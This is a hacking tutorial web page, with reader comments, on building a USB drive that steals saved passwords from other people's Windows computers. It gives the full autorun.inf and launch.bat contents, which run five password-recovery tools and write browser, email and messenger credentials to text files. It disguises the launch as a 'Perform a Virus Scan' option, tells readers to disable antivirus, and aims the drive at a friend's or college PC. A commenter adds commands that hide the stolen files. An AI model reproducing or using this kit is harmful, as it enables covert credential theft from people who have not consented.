Home How To How to capture passwords using USB drive

How to capture passwords using USB drive

by Unallocated Author

Note: This tutorial is only for educational purpose and do this at your own risk. We don’t provide the links of the tools you can Google them and get an updated version of it.

Today I will show you how to capture Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and an USB pen drive you can create your own root kit to capture passwords from your friend’s/college Computer.

We need the following tools to create our root kit:

MessenPass: Recovers the passwords of most popular Instant Messenger programs:
MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL
Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook
Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook
2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail,
Yahoo!, G-mail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by
Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as
older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected
Storage, including the Auto Complete passwords of Internet Explorer, passwords of
Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: Password Fox is a small password recovery tool that allows you to view

the user names and passwords stored by Mozilla Firefox Web browser. By default,
PasswordFox displays the passwords stored in your current profile, but you can easily
select to watch the passwords of any other Firefox profile. For each password entry,
the following information is displayed: Record Index, Web Site, User Name,
Password, User Name Field, Password Field, and the Signons file name.

Here is a step by step procedre to create the password toolkit:

NOTE: You must temporarily disable your antivirus before following these steps.

Step 1: Download all the 5 tools, extract them and copy only the executables(.exe files)
into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe
into your USB Drive.
Step 2: Create a new Notepad and write the following text into it:

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from New Text Document.txt to launch.bat
Step 3: Copy the launch.bat file also to your USB drive.
Step 4: Now your root kit is ready and you are all set to capture the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps

Step 5: Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

In the pop-up window, select the first option (Perform a Virus Scan).
Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This works on Windows 2000, XP,Vista and 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.This tutorial is only for educational purpose and do this at your own risk

You may also like

4 comments

Sini August 17, 2016 - 6:12 am

Autorun feature is disabled since windows 7 so how is this supposed to work on newer windows without user interaction ?

Ali August 16, 2016 - 1:34 pm

Kindly tell me the 5 elemnt 4 display wht is pspv ?

virus August 16, 2016 - 12:11 am

i made it better and before you

cd\

y:

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
c:\Windows\System32\attrib.exe +s +h mspass.txt

c:\Windows\System32\attrib.exe +s +h mailpv.txt

c:\Windows\System32\attrib.exe +s +h iepv.txt

c:\Windows\System32\attrib.exe +s +h pspv.txt

c:\Windows\System32\attrib.exe +s +h passwordfox.txt

hacker101 August 17, 2016 - 7:48 am

plz help whenever i create autorun it doesnt changes it remains as text document and nothing happens help plz

Comments are closed.